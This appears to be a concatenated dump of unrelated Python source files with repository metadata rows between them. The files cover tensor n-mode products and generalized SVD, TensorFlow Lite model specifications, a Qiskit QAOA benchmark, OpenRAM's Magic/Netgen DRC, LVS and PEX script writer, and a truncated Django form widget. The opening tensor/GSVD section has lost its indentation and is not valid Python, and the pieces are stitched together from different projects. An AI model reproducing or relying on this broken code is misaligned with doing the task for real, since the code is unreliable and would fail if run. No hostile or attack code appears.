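#   assert np.all(unflatten(flatten(T, 2), [2, 3, 4], 2) == T)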
def nmodmult(A, B, n):
    """NMODMULT performs the n-mode multiplication of a tensor and matrix
    T = NMODMULT(A, B, N)
    A is a tensor of order >= N
    B is a matrix to be multiplied
    N is the mode of the multiplication
    return: tensor product of A x_N B"""
Asize = np.asarray(A.shape);
Asize[n-1] = B.shape[0];
An=flatten(A,n)
T = unflatten(np.dot(B,An), Asize, n);
return T
def gsvd(A,B):
"""Computes the generalized singular value decomposition
U1,U2,V,S1,S2 = GSVD(A,B)
such that A=U1 * S1 * V'
B=U2 * S2 * V'
S1'*S1 + S2'*S2 = I
using the method described by Paige and Saunders in 1981
Arguments:
- `A`: a matrix of dimensions m x n
- `B`: a matrix of dimensions p x n
Returns: unitary matrices U1 and U2, a square matrix V, and
nonnegative diagonal matrices S1 and S2.
"""
A = np.asarray(A)
B = np.asarray(B)
m,n = A.shape
p,n1 = B.shape
if n1!=n:
raise LinAlgError('The number of columns in the two matrices A and B don\'t match')
#First Step of algorithm
P, R0, Q = svd(np.concatenate([A,B]))
k = sum(R0>1e-12)
R0=np.diag(R0)
#Second Step part a
P11 = P[:m,:k]
U1, SA, W1=svd(P11)
S1=np.zeros_like(P11)
np.fill_diagonal(S1, SA)
if S1.shape[0] > len(SA): #Workaround for bug #1953 in fill_diagonal
S1[len(SA):, :] = 0
#Second Step part b
P21 = P[m:m+p,:k]
VB, SB, W=svd(P21)
kr = min(p, k)
S2 = np.zeros((p,k))
S2[p-kr:, k-kr:] = np.diag(SB[kr::-1])
U2=reduce(np.dot, (P21, W1.T, pinv(S2)))
Z=np.zeros((k,n-k));
V=np.dot(np.hstack((np.dot(W1, R0[:k,:k]), Z)), Q).T
return U1, U2, S1, S2, V
def test():
T=np.reshape(np.arange(1,121).T, (3,4,5,2), order='FORTRAN')
    _, Z, Un, Sn, Vn = hosvd2(T)
x=nmodmult(Z, Un[0],1)
x=nmodmult(x, Un[1],2)
x=nmodmult(x, Un[2],3)
x=nmodmult(x, Un[3],4)
assert np.all(x-T<1e-12)
A=[[1, 6, 11],
[2, 7, 12],
[3, 8, 13],
[4, 9, 14],
[5, 10, 15]]
B=[[8, 1, 6],
[3, 5, 7],
[4, 9, 2]]
U1, U2, S1, S2, V = gsvd(A,B)
assert (np.all(reduce(np.dot, (U1,S1,V.T))-A < 1e-8) and np.all(reduce(np.dot, (U2,S2,V.T))-B < 1e-8))
A=[[1, 4, 7, 10, 13],
[2, 5, 8, 11, 14],
[3, 6, 9, 12, 15]]
B=[[17, 24, 1, 8, 15],
[23, 5, 7, 14, 16],
[ 4, 6, 13, 20, 22],
[10, 12, 19, 21, 3]]
U1, U2, S1, S2, V = gsvd(A,B)
assert (np.all(reduce(np.dot, (U1,S1,V.T))-A < 1e-8) and np.all(reduce(np.dot, (U2,S2,V.T))-B < 1e-8))
if __name__ == '__main__':
test()
| 29.307692
| 106
| 0.549256
|
f1644033ce063188c7fc737957fc2a09d10c467a
| 1,256
|
py
|
Python
|
tensorflow_examples/lite/model_customization/core/task/model_spec.py
|
rrtaylor/examples
|
2f1e9cb83f49f4678bbfcf9abbc677551ed557c4
|
[
"Apache-2.0"
] | 2
|
2019-11-26T09:52:53.000Z
|
2020-11-05T02:55:35.000Z
|
tensorflow_examples/lite/model_customization/core/task/model_spec.py
|
Mahesh-Bauri/examples
|
2f1e9cb83f49f4678bbfcf9abbc677551ed557c4
|
[
"Apache-2.0"
] | 7
|
2021-03-19T15:39:52.000Z
|
2022-03-12T00:52:01.000Z
|
tensorflow_examples/lite/model_customization/core/task/model_spec.py
|
Mahesh-Bauri/examples
|
2f1e9cb83f49f4678bbfcf9abbc677551ed557c4
|
[
"Apache-2.0"
] | 3
|
2019-12-11T18:56:32.000Z
|
2019-12-12T15:39:07.000Z
|
# Copyright 2019 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Model specification."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
class ImageModelSpec(object):
"""A specification of image model."""
input_image_shape = [224, 224]
mean_rgb = [0, 0, 0]
stddev_rgb = [255, 255, 255]
def __init__(self, name, uri):
self.name = name
self.uri = uri
efficientnet_b0_spec = ImageModelSpec(
name='efficientnet_b0',
uri='https://tfhub.dev/google/efficientnet/b0/feature-vector/1')
mobilenet_v2_spec = ImageModelSpec(
name='mobilenet_v2',
uri='https://tfhub.dev/google/tf2-preview/mobilenet_v2/feature_vector/4')
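# Illustrative: further specs can be registered the same way. The name and
# TF-Hub URI below are placeholders, not modules shipped with this file.
#   resnet_50_spec = ImageModelSpec(
#       name='resnet_50',
#       uri='https://tfhub.dev/...')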
| 32.205128
| 77
| 0.746815
|
2788b89eba53972310e1a74edb5d62f32b604c72
| 2,507
|
py
|
Python
|
data/p4VQE/R4/benchmark/startQiskit_QC201.py
|
UCLA-SEAL/QDiff
|
d968cbc47fe926b7f88b4adf10490f1edd6f8819
|
[
"BSD-3-Clause"
] | null | null | null |
data/p4VQE/R4/benchmark/startQiskit_QC201.py
|
UCLA-SEAL/QDiff
|
d968cbc47fe926b7f88b4adf10490f1edd6f8819
|
[
"BSD-3-Clause"
] | null | null | null |
data/p4VQE/R4/benchmark/startQiskit_QC201.py
|
UCLA-SEAL/QDiff
|
d968cbc47fe926b7f88b4adf10490f1edd6f8819
|
[
"BSD-3-Clause"
] | null | null | null |
# qubit number=3
# total number=10
import numpy as np
from qiskit import QuantumCircuit, execute, Aer, QuantumRegister, ClassicalRegister, transpile, BasicAer, IBMQ
import networkx as nx
from qiskit.visualization import plot_histogram
from typing import *
from pprint import pprint
from math import log2
from collections import Counter
from qiskit.test.mock import FakeVigo, FakeYorktown
kernel = 'circuit/bernstein'
def make_circuit(n:int) -> QuantumCircuit:
# circuit begin
input_qubit = QuantumRegister(n,"qc")
prog = QuantumCircuit(input_qubit)
prog.h(input_qubit[0]) # number=1
prog.h(input_qubit[1]) # number=2
prog.h(input_qubit[2]) # number=3
prog.h(input_qubit[3]) # number=4
prog.y(input_qubit[3]) # number=5
for edge in E:
k = edge[0]
l = edge[1]
prog.cp(-2 * gamma, input_qubit[k-1], input_qubit[l-1])
prog.p(gamma, k)
prog.p(gamma, l)
prog.rx(2 * beta, range(len(V)))
prog.x(input_qubit[3]) # number=7
prog.cx(input_qubit[1],input_qubit[0]) # number=8
prog.cx(input_qubit[1],input_qubit[0]) # number=9
# circuit end
return prog
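# Note (illustrative): make_circuit reads the module-level globals V, E, gamma
# and beta assigned in the __main__ block below; calling it before they are
# defined raises NameError.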
if __name__ == '__main__':
n = 4
V = np.arange(0, n, 1)
E = [(0, 1, 1.0), (0, 2, 1.0), (1, 2, 1.0), (3, 2, 1.0), (3, 1, 1.0)]
G = nx.Graph()
G.add_nodes_from(V)
G.add_weighted_edges_from(E)
step_size = 0.1
a_gamma = np.arange(0, np.pi, step_size)
a_beta = np.arange(0, np.pi, step_size)
a_gamma, a_beta = np.meshgrid(a_gamma, a_beta)
F1 = 3 - (np.sin(2 * a_beta) ** 2 * np.sin(2 * a_gamma) ** 2 - 0.5 * np.sin(4 * a_beta) * np.sin(4 * a_gamma)) * (
1 + np.cos(4 * a_gamma) ** 2)
result = np.where(F1 == np.amax(F1))
a = list(zip(result[0], result[1]))[0]
gamma = a[0] * step_size
beta = a[1] * step_size
prog = make_circuit(4)
sample_shot =5600
writefile = open("../data/startQiskit_QC201.csv", "w")
# prog.draw('mpl', filename=(kernel + '.png'))
IBMQ.load_account()
provider = IBMQ.get_provider(hub='ibm-q')
provider.backends()
backend = provider.get_backend("ibmq_5_yorktown")
circuit1 = transpile(prog, FakeYorktown())
circuit1.measure_all()
prog = circuit1
info = execute(prog,backend=backend, shots=sample_shot).result().get_counts()
print(info, file=writefile)
print("results end", file=writefile)
print(circuit1.depth(), file=writefile)
print(circuit1, file=writefile)
writefile.close()
| 27.25
| 118
| 0.634224
|
18ba53fcf2aabfb90186f575a24ec182cff55d92
| 19,856
|
py
|
Python
|
compiler/verify/magic.py
|
mudassiruddin/OpenRAM
|
0589a35f7315fc075eaca38c0abd477703e70bf7
|
[
"BSD-3-Clause"
] | null | null | null |
compiler/verify/magic.py
|
mudassiruddin/OpenRAM
|
0589a35f7315fc075eaca38c0abd477703e70bf7
|
[
"BSD-3-Clause"
] | null | null | null |
compiler/verify/magic.py
|
mudassiruddin/OpenRAM
|
0589a35f7315fc075eaca38c0abd477703e70bf7
|
[
"BSD-3-Clause"
] | null | null | null |
# See LICENSE for licensing information.
#
# Copyright (c) 2016-2021 Regents of the University of California and The Board
# of Regents for the Oklahoma Agricultural and Mechanical College
# (acting for and on behalf of Oklahoma State University)
# All rights reserved.
#
"""
This is a DRC/LVS/PEX interface file for magic + netgen.
We include the tech file for SCN4M_SUBM in the tech directory,
which is used by OpenRAM during DRC.
You can use this interactively by appending the magic system path in
your .magicrc file
path sys /Users/mrg/openram/technology/scn3me_subm/tech
We require the version 30 Magic rules which allow via stacking.
We obtained this file from Qflow ( http://opencircuitdesign.com/qflow/index.html )
and include its appropriate license.
"""
import os
import re
import shutil
import debug
from globals import OPTS
from run_script import *
# Keep track of statistics
num_drc_runs = 0
num_lvs_runs = 0
num_pex_runs = 0
# def filter_gds(cell_name, input_gds, output_gds):
# """ Run the gds through magic for any layer processing """
# global OPTS
# # Copy .magicrc file into temp dir
# magic_file = OPTS.openram_tech + "tech/.magicrc"
# if os.path.exists(magic_file):
# shutil.copy(magic_file, OPTS.openram_temp)
# else:
# debug.warning("Could not locate .magicrc file: {}".format(magic_file))
# run_file = OPTS.openram_temp + "run_filter.sh"
# f = open(run_file, "w")
# f.write("#!/bin/sh\n")
# f.write("{} -dnull -noconsole << EOF\n".format(OPTS.magic_exe[1]))
# f.write("gds polygon subcell true\n")
# f.write("gds warning default\n")
# f.write("gds read {}\n".format(input_gds))
# f.write("load {}\n".format(cell_name))
# f.write("cellname delete \\(UNNAMED\\)\n")
# #f.write("writeall force\n")
# f.write("select top cell\n")
# f.write("gds write {}\n".format(output_gds))
# f.write("quit -noprompt\n")
# f.write("EOF\n")
# f.close()
# os.system("chmod u+x {}".format(run_file))
# (outfile, errfile, resultsfile) = run_script(cell_name, "filter")
def write_drc_script(cell_name, gds_name, extract, final_verification, output_path, sp_name=None):
""" Write a magic script to perform DRC and optionally extraction. """
global OPTS
# Copy .magicrc file into the output directory
magic_file = os.environ.get('OPENRAM_MAGICRC', None)
if not magic_file:
magic_file = OPTS.openram_tech + "tech/.magicrc"
if os.path.exists(magic_file):
shutil.copy(magic_file, output_path + "/.magicrc")
else:
debug.warning("Could not locate .magicrc file: {}".format(magic_file))
run_file = output_path + "run_ext.sh"
f = open(run_file, "w")
f.write("#!/bin/sh\n")
f.write('export OPENRAM_TECH="{}"\n'.format(os.environ['OPENRAM_TECH']))
f.write('echo "$(date): Starting GDS to MAG using Magic {}"\n'.format(OPTS.drc_exe[1]))
f.write('\n')
f.write("{} -dnull -noconsole << EOF\n".format(OPTS.drc_exe[1]))
# Do not run DRC for extraction/conversion
f.write("drc off\n")
f.write("set VDD vdd\n")
f.write("set GND gnd\n")
f.write("set SUB gnd\n")
#f.write("gds polygon subcell true\n")
f.write("gds warning default\n")
# These two options are temporarily disabled until Tim fixes a bug in magic related
# to flattening channel routes and vias (hierarchy with no devices in it). Otherwise,
# they appear to be disconnected.
f.write("gds flatten true\n")
f.write("gds ordering true\n")
f.write("gds readonly true\n")
f.write("gds read {}\n".format(gds_name))
f.write('puts "Finished reading gds {}"\n'.format(gds_name))
f.write("load {}\n".format(cell_name))
f.write('puts "Finished loading cell {}"\n'.format(cell_name))
f.write("cellname delete \\(UNNAMED\\)\n")
f.write("writeall force\n")
# Extract
if not sp_name:
f.write("port makeall\n")
else:
f.write("readspice {}\n".format(sp_name))
if not extract:
pre = "#"
else:
pre = ""
if final_verification and OPTS.route_supplies:
f.write(pre + "extract unique all\n")
# Hack to work around unit scales in SkyWater
if OPTS.tech_name=="sky130":
f.write(pre + "extract style ngspice(si)\n")
f.write(pre + "extract\n")
f.write('puts "Finished extract"\n')
# f.write(pre + "ext2spice hierarchy on\n")
# f.write(pre + "ext2spice scale off\n")
# lvs exists in 8.2.79, but be backword compatible for now
# f.write(pre + "ext2spice lvs\n")
f.write(pre + "ext2spice hierarchy on\n")
f.write(pre + "ext2spice cthresh infinite\n")
f.write(pre + "ext2spice rthresh infinite\n")
f.write(pre + "ext2spice renumber off\n")
f.write(pre + "ext2spice scale off\n")
f.write(pre + "ext2spice blackbox on\n")
f.write(pre + "ext2spice subcircuit top on\n")
f.write(pre + "ext2spice global off\n")
# Can choose hspice, ngspice, or spice3,
# but they all seem compatible enough.
f.write(pre + "ext2spice format ngspice\n")
f.write(pre + "ext2spice {}\n".format(cell_name))
f.write('puts "Finished ext2spice"\n')
f.write("quit -noprompt\n")
f.write("EOF\n")
f.write("magic_retcode=$?\n")
f.write('echo "$(date): Finished ($magic_retcode) GDS to MAG using Magic {}"\n'.format(OPTS.drc_exe[1]))
f.write("exit $magic_retcode\n")
f.close()
os.system("chmod u+x {}".format(run_file))
run_file = output_path + "run_drc.sh"
f = open(run_file, "w")
f.write("#!/bin/sh\n")
f.write('export OPENRAM_TECH="{}"\n'.format(os.environ['OPENRAM_TECH']))
# Copy the bitcell mag files if they exist
try:
from tech import blackbox_cells
except ImportError:
blackbox_cells = []
for blackbox_cell_name in blackbox_cells:
mag_file = OPTS.openram_tech + "maglef_lib/" + blackbox_cell_name + ".mag"
debug.check(os.path.isfile(mag_file), "Could not find blackbox cell {}".format(mag_file))
f.write('cp {0} .\n'.format(mag_file))
f.write('echo "$(date): Starting DRC using Magic {}"\n'.format(OPTS.drc_exe[1]))
f.write('\n')
f.write("{} -dnull -noconsole << EOF\n".format(OPTS.drc_exe[1]))
f.write("load {} -dereference\n".format(cell_name))
f.write('puts "Finished loading cell {}"\n'.format(cell_name))
f.write("cellname delete \\(UNNAMED\\)\n")
f.write("select top cell\n")
f.write("expand\n")
f.write('puts "Finished expanding"\n')
f.write("drc euclidean on\n")
f.write("drc check\n")
f.write('puts "Finished drc check"\n')
f.write("drc catchup\n")
f.write('puts "Finished drc catchup"\n')
# This is needed instead of drc count total because it displays
# some errors that are not "DRC" errors.
# f.write("puts -nonewline \"Total DRC errors found: \"\n")
# f.write("puts stdout [drc listall count total]\n")
f.write("drc count total\n")
f.write("quit -noprompt\n")
f.write("EOF\n")
f.write("magic_retcode=$?\n")
f.write('echo "$(date): Finished ($magic_retcode) DRC using Magic {}"\n'.format(OPTS.drc_exe[1]))
f.write("exit $magic_retcode\n")
f.close()
os.system("chmod u+x {}".format(run_file))
def run_drc(cell_name, gds_name, sp_name=None, extract=True, final_verification=False):
"""Run DRC check on a cell which is implemented in gds_name."""
global num_drc_runs
num_drc_runs += 1
write_drc_script(cell_name, gds_name, extract, final_verification, OPTS.openram_temp, sp_name=sp_name)
(outfile, errfile, resultsfile) = run_script(cell_name, "ext")
(outfile, errfile, resultsfile) = run_script(cell_name, "drc")
# Check the result for these lines in the summary:
# Total DRC errors found: 0
# The count is shown in this format:
# Cell replica_cell_6t has 3 error tiles.
# Cell tri_gate_array has 8 error tiles.
# etc.
try:
f = open(outfile, "r")
except FileNotFoundError:
debug.error("Unable to load DRC results file from {}. Is magic set up?".format(outfile), 1)
results = f.readlines()
f.close()
errors=1
# those lines should be the last 3
for line in results:
if "Total DRC errors found:" in line:
errors = int(re.split(": ", line)[1])
break
else:
debug.error("Unable to find the total error line in Magic output.", 1)
# always display this summary
result_str = "DRC Errors {0}\t{1}".format(cell_name, errors)
if errors > 0:
for line in results:
if "error tiles" in line:
debug.info(1, line.rstrip("\n"))
debug.warning(result_str)
else:
debug.info(1, result_str)
return errors
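# Illustrative call (the cell and GDS names below are placeholders):
#   errors = run_drc('sram_2_16', '/tmp/openram/sram_2_16.gds')
#   # errors == 0 when the layout is DRC clean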
def write_lvs_script(cell_name, gds_name, sp_name, final_verification=False, output_path=None):
""" Write a netgen script to perform LVS. """
global OPTS
if not output_path:
output_path = OPTS.openram_temp
# Copy setup.tcl file into the output directory
setup_file = os.environ.get('OPENRAM_NETGENRC', None)
if not setup_file:
setup_file = OPTS.openram_tech + "tech/setup.tcl"
if os.path.exists(setup_file):
# Copy setup.tcl file into temp dir
shutil.copy(setup_file, output_path)
else:
setup_file = 'nosetup'
run_file = output_path + "/run_lvs.sh"
f = open(run_file, "w")
f.write("#!/bin/sh\n")
f.write('export OPENRAM_TECH="{}"\n'.format(os.environ['OPENRAM_TECH']))
f.write('echo "$(date): Starting LVS using Netgen {}"\n'.format(OPTS.lvs_exe[1]))
f.write("{} -noconsole << EOF\n".format(OPTS.lvs_exe[1]))
# f.write("readnet spice {0}.spice\n".format(cell_name))
# f.write("readnet spice {0}\n".format(sp_name))
f.write("lvs {{{0}.spice {0}}} {{{1} {0}}} {2} {0}.lvs.report -full -json\n".format(cell_name, sp_name, setup_file))
f.write("quit\n")
f.write("EOF\n")
f.write("magic_retcode=$?\n")
f.write('echo "$(date): Finished ($magic_retcode) LVS using Netgen {}"\n'.format(OPTS.lvs_exe[1]))
f.write("exit $magic_retcode\n")
f.close()
os.system("chmod u+x {}".format(run_file))
def run_lvs(cell_name, gds_name, sp_name, final_verification=False, output_path=None):
"""Run LVS check on a given top-level name which is
implemented in gds_name and sp_name. Final verification will
ensure that there are no remaining virtual conections. """
global num_lvs_runs
num_lvs_runs += 1
if not output_path:
output_path = OPTS.openram_temp
write_lvs_script(cell_name, gds_name, sp_name, final_verification)
(outfile, errfile, resultsfile) = run_script(cell_name, "lvs")
total_errors = 0
# check the result for these lines in the summary:
try:
f = open(resultsfile, "r")
except FileNotFoundError:
debug.error("Unable to load LVS results from {}".format(resultsfile), 1)
results = f.readlines()
f.close()
# Look for the results after the final "Subcircuit summary:"
# which will be the top-level netlist.
final_results = []
for line in reversed(results):
if "Subcircuit summary:" in line:
break
else:
final_results.insert(0, line)
# There were property errors in any module.
test = re.compile("Property errors were found.")
propertyerrors = list(filter(test.search, results))
total_errors += len(propertyerrors)
# Require pins to match?
# Cell pin lists for pnand2_1.spice and pnand2_1 altered to match.
# test = re.compile(".*altered to match.")
# pinerrors = list(filter(test.search, results))
# if len(pinerrors)>0:
# debug.warning("Pins altered to match in {}.".format(cell_name))
#if len(propertyerrors)>0:
# debug.warning("Property errors found, but not checking them.")
# Netlists do not match.
test = re.compile("Netlists do not match.")
incorrect = list(filter(test.search, final_results))
total_errors += len(incorrect)
# Netlists match uniquely.
test = re.compile("match uniquely.")
correct = list(filter(test.search, final_results))
# Fail if they don't match. Something went wrong!
if len(correct) == 0:
total_errors += 1
if total_errors>0:
# Just print out the whole file, it is short.
for e in results:
debug.info(1,e.strip("\n"))
debug.error("{0}\tLVS mismatch (results in {1})".format(cell_name,resultsfile))
else:
debug.info(1, "{0}\tLVS matches".format(cell_name))
return total_errors
def run_pex(name, gds_name, sp_name, output=None, final_verification=False, output_path=None):
"""Run pex on a given top-level name which is
implemented in gds_name and sp_name. """
global num_pex_runs
num_pex_runs += 1
    if not output_path:
        output_path = OPTS.openram_temp
    os.chdir(output_path)
    if output is None:
        output = name + ".pex.netlist"
# check if lvs report has been done
# if not run drc and lvs
if not os.path.isfile(name + ".lvs.report"):
run_drc(name, gds_name)
run_lvs(name, gds_name, sp_name)
    # pex_fix runs PEX via a generated shell script, whereas the original dev
    # method used batch mode. The old dev batch-mode code does not run and has
    # been split into separate functions.
pex_runset = write_script_pex_rule(gds_name, name, sp_name, output)
errfile = "{0}{1}.pex.err".format(output_path, name)
outfile = "{0}{1}.pex.out".format(output_path, name)
script_cmd = "{0} 2> {1} 1> {2}".format(pex_runset,
errfile,
outfile)
cmd = script_cmd
debug.info(2, cmd)
os.system(cmd)
# rename technology models
    pex_netlist = open(output, 'r')
    s = pex_netlist.read()
    pex_netlist.close()
s = s.replace('pfet', 'p')
s = s.replace('nfet', 'n')
f = open(output, 'w')
f.write(s)
f.close()
# also check the output file
f = open(outfile, "r")
results = f.readlines()
f.close()
out_errors = find_error(results)
debug.check(os.path.isfile(output), "Couldn't find PEX extracted output.")
correct_port(name, output, sp_name)
return out_errors
def write_batch_pex_rule(gds_name, name, sp_name, output):
"""
The dev branch old batch mode runset
2. magic can perform extraction with the following:
#!/bin/sh
rm -f $1.ext
rm -f $1.spice
magic -dnull -noconsole << EOF
tech load SCN3ME_SUBM.30
#scalegrid 1 2
gds rescale no
gds polygon subcell true
gds warning default
gds read $1
extract
ext2spice scale off
ext2spice
quit -noprompt
EOF
"""
pex_rules = drc["xrc_rules"]
pex_runset = {
'pexRulesFile': pex_rules,
'pexRunDir': OPTS.openram_temp,
'pexLayoutPaths': gds_name,
'pexLayoutPrimary': name,
#'pexSourcePath' : OPTS.openram_temp+"extracted.sp",
'pexSourcePath': sp_name,
'pexSourcePrimary': name,
'pexReportFile': name + ".lvs.report",
'pexPexNetlistFile': output,
'pexPexReportFile': name + ".pex.report",
'pexMaskDBFile': name + ".maskdb",
'cmnFDIDEFLayoutPath': name + ".def",
}
# write the runset file
file = OPTS.openram_temp + "pex_runset"
f = open(file, "w")
for k in sorted(pex_runset.keys()):
f.write("*{0}: {1}\n".format(k, pex_runset[k]))
f.close()
return file
def write_script_pex_rule(gds_name, cell_name, sp_name, output):
global OPTS
run_file = OPTS.openram_temp + "run_pex.sh"
f = open(run_file, "w")
f.write("#!/bin/sh\n")
f.write('export OPENRAM_TECH="{}"\n'.format(os.environ['OPENRAM_TECH']))
f.write('echo "$(date): Starting PEX using Magic {}"\n'.format(OPTS.drc_exe[1]))
f.write("{} -dnull -noconsole << EOF\n".format(OPTS.drc_exe[1]))
f.write("gds polygon subcell true\n")
f.write("gds warning default\n")
f.write("gds read {}\n".format(gds_name))
f.write("load {}\n".format(cell_name))
f.write("select top cell\n")
f.write("expand\n")
if not sp_name:
f.write("port makeall\n")
else:
f.write("readspice {}\n".format(sp_name))
f.write("extract\n")
f.write("ext2sim labels on\n")
f.write("ext2sim\n")
f.write("extresist simplify off\n")
f.write("extresist all\n")
f.write("ext2spice hierarchy off\n")
f.write("ext2spice format ngspice\n")
f.write("ext2spice renumber off\n")
f.write("ext2spice scale off\n")
f.write("ext2spice blackbox on\n")
f.write("ext2spice subcircuit top on\n")
f.write("ext2spice global off\n")
f.write("ext2spice extresist on\n")
f.write("ext2spice {}\n".format(cell_name))
f.write("quit -noprompt\n")
f.write("EOF\n")
f.write("magic_retcode=$?\n")
f.write("mv {0}.spice {1}\n".format(cell_name, output))
f.write('echo "$(date): Finished PEX using Magic {}"\n'.format(OPTS.drc_exe[1]))
f.write("exit $magic_retcode\n")
f.close()
os.system("chmod u+x {}".format(run_file))
return run_file
def find_error(results):
# Errors begin with "ERROR:"
test = re.compile("ERROR:")
stdouterrors = list(filter(test.search, results))
for e in stdouterrors:
debug.error(e.strip("\n"))
out_errors = len(stdouterrors)
return out_errors
def correct_port(name, output_file_name, ref_file_name):
pex_file = open(output_file_name, "r")
contents = pex_file.read()
# locate the start of circuit definition line
match = re.search(r'^\.subckt+[^M]*', contents, re.MULTILINE)
match_index_start = match.start()
match_index_end = match.end()
# store the unchanged part of pex file in memory
pex_file.seek(0)
part1 = pex_file.read(match_index_start)
pex_file.seek(match_index_end)
part2 = pex_file.read()
bitcell_list = "+ "
    if OPTS.words_per_row:
        for bank in range(OPTS.num_banks):
            row = int(OPTS.num_words / OPTS.words_per_row) - 1
            col = int(OPTS.word_size * OPTS.words_per_row) - 1
            bitcell_list += "bitcell_Q_b{0}_r{1}_c{2} ".format(bank, row, col)
            bitcell_list += "bitcell_Q_bar_b{0}_r{1}_c{2} ".format(bank, row, col)
            for col in range(OPTS.word_size * OPTS.words_per_row):
                for port in range(OPTS.num_r_ports + OPTS.num_w_ports + OPTS.num_rw_ports):
                    bitcell_list += "bl{0}_{1} ".format(bank, col)
                    bitcell_list += "br{0}_{1} ".format(bank, col)
    bitcell_list += "\n"
control_list = "+ "
if OPTS.words_per_row:
for bank in range(OPTS.num_banks):
control_list += "bank_{}/s_en0".format(bank)
control_list += '\n'
part2 = bitcell_list + control_list + part2
pex_file.close()
# obtain the correct definition line from the original spice file
sp_file = open(ref_file_name, "r")
contents = sp_file.read()
circuit_title = re.search(".SUBCKT " + str(name) + ".*", contents)
circuit_title = circuit_title.group()
sp_file.close()
# write the new pex file with info in the memory
output_file = open(output_file_name, "w")
output_file.write(part1)
output_file.write(circuit_title + '\n')
output_file.write(part2)
output_file.close()
def print_drc_stats():
debug.info(1, "DRC runs: {0}".format(num_drc_runs))
def print_lvs_stats():
debug.info(1, "LVS runs: {0}".format(num_lvs_runs))
def print_pex_stats():
debug.info(1, "PEX runs: {0}".format(num_pex_runs))
| 34.532174
| 120
| 0.639303
|
e84065fa0f7f4c372c96bad796c87e7519ec6604
| 3,291
|
py
|
Python
|
setup.py
|
ba-robo/ruckig
|
5dcdaa654a5d19ef9d7fd745e38294f5a19605d1
|
[
"MIT"
] | null | null | null |
setup.py
|
ba-robo/ruckig
|
5dcdaa654a5d19ef9d7fd745e38294f5a19605d1
|
[
"MIT"
] | null | null | null |
setup.py
|
ba-robo/ruckig
|
5dcdaa654a5d19ef9d7fd745e38294f5a19605d1
|
[
"MIT"
] | null | null | null |
import os
import re
import subprocess
import sys
from setuptools import setup, Extension, find_packages
from setuptools.command.build_ext import build_ext
from distutils.version import LooseVersion
with open('README.md', 'r') as readme_file:
long_description = readme_file.read()
class CMakeExtension(Extension):
def __init__(self, name, sourcedir=''):
Extension.__init__(self, name, sources=[])
self.sourcedir = os.path.abspath(sourcedir)
class CMakeBuild(build_ext):
def run(self):
try:
out = subprocess.check_output(['cmake', '--version'])
except OSError as err:
raise RuntimeError(
'CMake must be installed to build the following extensions: ' +
', '.join(e.name for e in self.extensions)
) from err
cmake_version = LooseVersion(re.search(r'version\s*([\d.]+)', out.decode()).group(1))
if cmake_version < LooseVersion('3.10.0'):
raise RuntimeError('CMake >= 3.10.0 is required')
for ext in self.extensions:
self.build_extension(ext)
def build_extension(self, ext):
extdir = os.path.abspath(os.path.dirname(self.get_ext_fullpath(ext.name)))
# required for auto-detection of auxiliary "native" libs
if not extdir.endswith(os.path.sep):
extdir += os.path.sep
build_type = os.environ.get('BUILD_TYPE', 'Release')
build_args = ['--config', build_type]
cmake_args = [
'-DCMAKE_LIBRARY_OUTPUT_DIRECTORY=' + extdir,
'-DCMAKE_ARCHIVE_OUTPUT_DIRECTORY=' + extdir,
'-DCMAKE_LIBRARY_OUTPUT_DIRECTORY_RELEASE=' + extdir,
'-DCMAKE_ARCHIVE_OUTPUT_DIRECTORY_RELEASE=' + extdir,
'-DPYTHON_EXECUTABLE={}'.format(sys.executable),
'-DEXAMPLE_VERSION_INFO={}'.format(self.distribution.get_version()),
'-DCMAKE_BUILD_TYPE=' + build_type,
'-DBUILD_PYTHON_MODULE=ON',
'-DBUILD_EXAMPLES=OFF',
'-DBUILD_TESTS=OFF',
'-DBUILD_SHARED_LIBS=OFF',
'-DCMAKE_POSITION_INDEPENDENT_CODE=ON',
]
if not os.path.exists(self.build_temp):
os.makedirs(self.build_temp)
subprocess.check_call(['cmake', ext.sourcedir] + cmake_args, cwd=self.build_temp)
subprocess.check_call(['cmake', '--build', '.'] + build_args, cwd=self.build_temp)
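# Illustrative invocation (assumed, standard setuptools behavior; BUILD_TYPE
# is read by build_extension above):
#   BUILD_TYPE=Debug python setup.py build_ext --inplace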
setup(
name='ruckig',
version='0.5.0',
description='Instantaneous Motion Generation for Robots and Machines.',
long_description=long_description,
long_description_content_type='text/markdown',
author='Lars Berscheid',
author_email='info@ruckig.com',
url='https://www.ruckig.com',
packages=find_packages(),
license='MIT',
ext_modules=[CMakeExtension('python_ruckig')],
cmdclass=dict(build_ext=CMakeBuild),
keywords=['robotics', 'trajectory-generation', 'real-time', 'jerk-constrained', 'time-optimal'],
classifiers=[
'Development Status :: 5 - Production/Stable',
'Intended Audience :: Science/Research',
'Topic :: Scientific/Engineering',
'License :: OSI Approved :: MIT License',
'Programming Language :: C++',
],
python_requires='>=3.6',
zip_safe=False,
)
| 35.010638
| 100
| 0.639623
|
921b7e09b07ba1824e4e275c23ae044321319a4c
| 1,196
|
py
|
Python
|
workon/forms/info.py
|
dalou/django-workon
|
ef63c0a81c00ef560ed693e435cf3825f5170126
|
[
"BSD-3-Clause"
] | null | null | null |
workon/forms/info.py
|
dalou/django-workon
|
ef63c0a81c00ef560ed693e435cf3825f5170126
|
[
"BSD-3-Clause"
] | null | null | null |
workon/forms/info.py
|
dalou/django-workon
|
ef63c0a81c00ef560ed693e435cf3825f5170126
|
[
"BSD-3-Clause"
] | null | null | null |
# encoding: utf-8
import logging
from django import forms
from django.utils.safestring import mark_safe
logger = logging.getLogger(__name__)
class InfoField(forms.CharField):
def __init__(self, *args, **kwargs):
if 'widget' not in kwargs:
kwargs['widget'] = InfoInput(
text=kwargs.pop('text', ""),
)
super(InfoField, self).__init__(*args, **kwargs)
class InfoInput(forms.widgets.HiddenInput):
def __init__(self, *args, **kwargs):
self.text = kwargs.pop('text', "")
super(InfoInput, self).__init__(*args, **kwargs)
    def render(self, name, value, attrs=None, renderer=None):
        attrs = dict(attrs or {})  # avoid sharing a mutable default dict
        if 'id' not in attrs:
            attrs['id'] = "id_%s" % name
        # Fall back to the widget's static text when no value is bound.
        return mark_safe('<div id="%(id)s">%(value)s</div>' % {
            'id': attrs['id'],
